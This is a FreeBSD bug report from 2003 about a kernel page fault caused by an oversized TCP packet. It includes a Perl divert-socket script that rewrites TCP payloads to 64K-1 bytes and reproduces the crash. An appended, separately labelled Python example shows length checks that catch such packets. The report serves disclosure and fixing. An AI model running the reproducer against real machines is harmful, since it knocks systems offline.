Date:      Thu, 10 Jul 2003 09:10:14 +0100
From:      Nigel Horne <njh@despammed.com>
To:        FreeBSD-gnats-submit@FreeBSD.org
Subject:   kern/54309: TCP Packet of 64K-1 crashes FreeBSD4.8
Message-ID:  <200307100910.14218.njh@despammed.com>
Resent-Message-ID: <200307100820.h6A8KLtZ027022@freefall.freebsd.org>


>Number:         54309
>Category:       kern
>Synopsis:       TCP Packet of 64K-1 crashes FreeBSD4.8
>Confidential:   no
>Severity:       serious
>Priority:       medium
>Responsible:    freebsd-bugs
>State:          open
>Quarter:        
>Keywords:       
>Date-Required:
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Thu Jul 10 01:20:21 PDT 2003
>Closed-Date:
>Last-Modified:
>Originator:     Nigel Horne
>Release:        FreeBSD 4.8-RELEASE i386
>Organization:
NJH Music
>Environment:
System: FreeBSD gsec1.itac-uk.com 4.8-RELEASE FreeBSD 4.8-RELEASE #0: Wed Jul 9 13:46:32 BST 2003 njh@dev.itac.local:/usr/obj/usr/src/sys/NJHKERNEL i386

        IBM, FreeBSD4.8
>Description:

        A simple Perl program (see attached) causes a kernel page fault.
>How-To-Repeat:
#!/usr/bin/perl -wT

# To be run as root under FreeBSD
# First do: ipfw add divert 9999 tcp from any to <ip> 3994
# Where <ip> is the IP address of the prodigy, e.g. 192.168.3.40
# You may need to reconfigure BSD first to support ipfw:
# options         IPFIREWALL
# options         IPDIVERT
# options         IPFIREWALL_FORWARD
# options         IPFIREWALL_VERBOSE
# options         IPFIREWALL_VERBOSE_LIMIT=100
# options         IPFIREWALL_DEFAULT_TO_ACCEPT
# options         IPFILTER
# options         IPFILTER_LOG
# options         TCPDEBUG
# options         TCP_DROP_SYNFIN
# options         ICMP_BANDLIM
# options         DUMMYNET
# options         IPSTEALTH
#
# Then try telnet 192.168.3.40 3994, sit back and watch the output

use strict;
use Net::Divert;
use NetPacket::IP;
use NetPacket::TCP;

my $ipFilter = Net::Divert->new('dev.gsec1.local', 9999);

$ipFilter->getPackets(\&handler);

sub handler {
        my($packet, $fwtag) = @_;

        my $ip = NetPacket::IP->decode($packet);

        if($ip->{proto} == NetPacket::IP->IP_PROTO_TCP) {
                my $tcp = NetPacket::TCP->decode($ip->{data});

                print "source " . $tcp->{src_port} . " dest " . $tcp->{dest_port} . "\n";

                # $tcp->{flags} |= SYN;
                # $tcp->{flags} &= ~ACK;

                # $tcp->{seqnum} = 0;

                # replace the TCP payload with 64K-1 bytes of filler (the packet size from the synopsis)
                $tcp->{data} = 'x' x 65535;

                $ip->{data} = $tcp->encode($ip);

                $packet = $ip->encode;

        }
        $ipFilter->putPacket($packet, $fwtag);
}
>Fix:

-- 
Nigel Horne. Arranger, Composer, Conductor, Typesetter.
Owner of the brass band group of the Internet. ICQ#20252325
njh@bandsman.co.uk http://www.bandsman.co.uk/music.htm
>Release-Note:
>Audit-Trail:
>Unformatted:
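Added example (Python; not from the bug report above and not FreeBSD code): the report does not analyse why the kernel faults, but one thing any divert filter that rewrites payloads should check before handing a packet back with putPacket is that the result is still a well-formed IPv4 datagram. A 65535-byte TCP payload plus 20 bytes of IP header and 20 bytes of TCP header is 65575 bytes, which cannot be represented in the 16-bit IPv4 total-length field, and Perl's pack('n') silently truncates such a value. The code below builds a packet with the same truncating behaviour (addresses, ports, identification and payloads are constructed values) and shows the length checks a filter should apply before re-injecting.

```python
"""Length sanity checks for IPv4/TCP packets before a divert filter re-injects them.

Added example, not part of the original bug report. Addresses, ports and
payloads are constructed for illustration; checksums are left at zero because
the checks below concern length bookkeeping, not integrity.
"""
import socket
import struct

IPV4_MAX_TOTAL_LEN = 0xFFFF   # the total-length field is 16 bits, headers included
IPV4_HDR_LEN = 20             # IPv4 header without options
TCP_HDR_LEN = 20              # TCP header without options


def build_ipv4_tcp(payload, src="192.168.3.1", dst="192.168.3.40", sport=40000, dport=3994):
    """Build a minimal IPv4+TCP packet around `payload` and return the raw bytes.

    The total-length field is packed into 16 bits the way Perl's pack('n') does,
    i.e. silently truncated, so an oversized packet ends up with a length field
    that no longer describes the buffer it travels in."""
    real_len = IPV4_HDR_LEN + TCP_HDR_LEN + len(payload)
    ip_hdr = struct.pack("!BBHHHBBH4s4s",
                         0x45,                      # version 4, IHL 5 (20 bytes)
                         0,                         # TOS
                         real_len & 0xFFFF,         # 16-bit truncation, as pack('n') would do
                         0x1234,                    # identification (constructed)
                         0x4000,                    # flags DF, fragment offset 0
                         64,                        # TTL
                         socket.IPPROTO_TCP,
                         0,                         # header checksum (not computed here)
                         socket.inet_aton(src),
                         socket.inet_aton(dst))
    tcp_hdr = struct.pack("!HHIIBBHHH",
                          sport, dport,
                          0,                        # sequence number
                          0,                        # acknowledgement number
                          (TCP_HDR_LEN // 4) << 4,  # data offset 5, reserved bits 0
                          0x18,                     # flags PSH|ACK
                          65535,                    # window
                          0,                        # checksum (not computed here)
                          0)                        # urgent pointer
    return ip_hdr + tcp_hdr + payload


def validate_ipv4(pkt):
    """Return a list of problems found in `pkt`; an empty list means it is safe to pass on.

    These are the things a filter that rewrites payloads can get wrong: the
    buffer must not exceed the 16-bit maximum at all, the total-length field
    must match the buffer, and a TCP header must still fit inside that length."""
    problems = []
    if len(pkt) < IPV4_HDR_LEN:
        return ["truncated: shorter than an IPv4 header"]
    ver_ihl, _tos, total_len, _id, _frag, _ttl, proto, _cksum, _src, _dst = \
        struct.unpack("!BBHHHBBH4s4s", pkt[:IPV4_HDR_LEN])
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4:
        problems.append("not an IPv4 packet")
    if ihl < IPV4_HDR_LEN:
        problems.append("IHL below the 20-byte minimum")
    if len(pkt) > IPV4_MAX_TOTAL_LEN:
        problems.append("buffer of %d bytes exceeds the IPv4 maximum of %d"
                        % (len(pkt), IPV4_MAX_TOTAL_LEN))
    if total_len != len(pkt):
        problems.append("total-length field %d does not match buffer length %d"
                        % (total_len, len(pkt)))
    if proto == socket.IPPROTO_TCP and total_len < ihl + TCP_HDR_LEN:
        problems.append("TCP header does not fit inside the declared IP total length")
    return problems


def reinject_or_drop(pkt):
    """What a divert handler should do with a rewritten packet: return it only
    when validate_ipv4() finds nothing, otherwise return None so the caller drops it."""
    return pkt if not validate_ipv4(pkt) else None


if __name__ == "__main__":
    for name, payload in (("small", b"hello"), ("64K-1", b"x" * 65535)):
        pkt = build_ipv4_tcp(payload)
        print(name, len(pkt), "bytes:", validate_ipv4(pkt) or "ok")
```

For the 64K-1 payload validate_ipv4() reports three problems (the buffer is over the maximum, the length field disagrees with the buffer, and the TCP header no longer fits inside the declared length), while ordinary payloads pass cleanly; reinject_or_drop() then returns None for the oversized packet instead of handing it back to the kernel.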